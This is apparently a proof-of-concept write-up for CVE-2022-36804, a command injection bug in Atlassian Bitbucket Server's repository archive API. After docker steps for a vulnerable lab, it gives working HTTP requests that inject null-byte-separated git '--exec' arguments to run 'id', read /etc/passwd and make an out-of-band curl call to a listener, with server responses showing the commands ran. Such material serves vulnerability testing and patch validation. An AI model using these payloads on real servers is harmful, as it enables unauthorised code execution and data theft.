Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)
In affected versions of Atlassian Bitbucket Server and Data Center a Command Injection Vulnerability exists in multiple API endpoints where an attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.
docker pull atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
docker run -v /data/bitbucket:/var/atlassian/application-data/bitbucket --name="bitbucket" -d -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server:7.2.5-ubuntu-jdk11- Create new PROJECT named
CFXand a repository namedlordand make it public, You can use any name for the project and repository. - URL to list public repositories
Curl http://127.0.0.1:7990/rest/api/latest/repos
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
HTTP/1.1 500
X-AREQUESTID: @1J1EWV1x490x54736x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: accept-encoding,x-auserid,cookie,x-ausername,accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 04 Oct 2022 08:10:56 GMT
Connection: close
Content-Length: 380
{"errors":[{"context":null,"message":"'/usr/bin/git archive --format=zip --prefix=fusion/\u0000--remote=/\u0000--exec=`id`\u0000--prefix=/ -- 49f16ce1e8ad32a360c9db7a3a84a0b72a12c51f bighax' exited with code 128 saying: `id` '/': 1: uid=2003(bitbucket): not found\nfatal: the remote end hung up unexpectedly","exceptionName":"com.atlassian.bitbucket.scm.CommandFailedException"}]}
- Reading
/etc/passwd
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60cat%20/etc/passwd%60%00--prefix=/- OOB Test, Replace
http://example.comwith Burp collab URL or NC listener
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=qualys/%00--remote=/%00--exec=curl%20http://example.com%00--prefix=/REQUEST
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
RESPONSE
HTTP/1.1 200
X-AREQUESTID: @1J1EWV1x506x54738x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: X-AUSERNAME
Vary: X-AUSERID
Vary: Cookie
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="lord-master@49f16ce1e8a.zip"; filename*=UTF-8''lord-master%4049f16ce1e8a.zip
Content-Type: application/octet-stream
Content-Length: 875
Date: Tue, 04 Oct 2022 08:26:21 GMT
usage: git archive [<options>] <tree-ish> [<path>...]
or: git archive --list
or: git archive --remote <repo> [--exec <cmd>] [<options>] <tree-ish> [<path>...]
or: git archive --remote <repo> [--exec <cmd>] --list
--format <fmt> archive format
--prefix <prefix> prepend prefix to each pathname in the archive
-o, --output <file> write the archive to this file
--worktree-attributes
read .gitattributes in working directory
-v, --verbose report archived files on stderr
-0 store only
-1 compress faster
-9 compress better
-l, --list list supported archive formats
--remote <repo> retrieve the archive from remote repository <repo>
--exec <command> path to the remote git-upload-archive command